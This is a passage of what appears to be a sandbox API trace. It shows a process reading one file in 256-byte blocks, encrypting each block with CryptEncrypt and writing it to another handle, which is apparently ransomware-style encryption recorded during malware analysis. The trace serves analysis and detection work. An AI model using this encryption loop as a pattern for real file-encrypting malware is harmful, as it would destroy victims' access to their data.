nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.292] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.293] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.293] GetLastError () returned 0x0 [0145.293] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.293] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.293] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.293] GetLastError () returned 0x0 [0145.293] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.293] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.293] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.293] GetLastError () returned 0x0 [0145.293] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.293] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.293] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.293] GetLastError () returned 0x0 [0145.293] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.293] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.293] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.293] GetLastError () returned 0x0 [0145.293] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.293] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.293] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.293] GetLastError () returned 0x0 [0145.293] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.293] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.293] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.294] GetLastError () returned 0x0 [0145.294] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.294] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.294] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.294] GetLastError () returned 0x0 [0145.294] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.294] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.294] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.294] GetLastError () returned 0x0 [0145.294] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.294] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.294] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.294] GetLastError () returned 0x0 [0145.294] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.294] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.294] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.294] GetLastError () returned 0x0 [0145.294] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.294] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.294] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.294] GetLastError () returned 0x0 [0145.294] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.294] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.294] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.294] GetLastError () returned 0x0 [0145.294] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.295] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.295] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.295] GetLastError () returned 0x0 [0145.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.295] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.295] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.295] GetLastError () returned 0x0 [0145.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.295] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.295] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.295] GetLastError () returned 0x0 [0145.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.295] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.295] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.295] GetLastError () returned 0x0 [0145.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.295] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.295] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.295] GetLastError () returned 0x0 [0145.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.295] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.295] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.295] GetLastError () returned 0x0 [0145.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.295] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.296] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.296] GetLastError () returned 0x0 [0145.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.296] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.296] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.296] GetLastError () returned 0x0 [0145.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.296] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.296] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.296] GetLastError () returned 0x0 [0145.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.296] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.296] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.296] GetLastError () returned 0x0 [0145.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.296] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.296] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.296] GetLastError () returned 0x0 [0145.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.296] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.296] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.296] GetLastError () returned 0x0 [0145.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.296] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.296] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.296] GetLastError () returned 0x0 [0145.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.297] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.297] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.297] GetLastError () returned 0x0 [0145.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.297] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.297] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.297] GetLastError () returned 0x0 [0145.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.297] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.297] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.297] GetLastError () returned 0x0 [0145.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.297] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.297] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.297] GetLastError () returned 0x0 [0145.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.297] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.297] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.297] GetLastError () returned 0x0 [0145.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.297] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.297] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.297] GetLastError () returned 0x0 [0145.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | 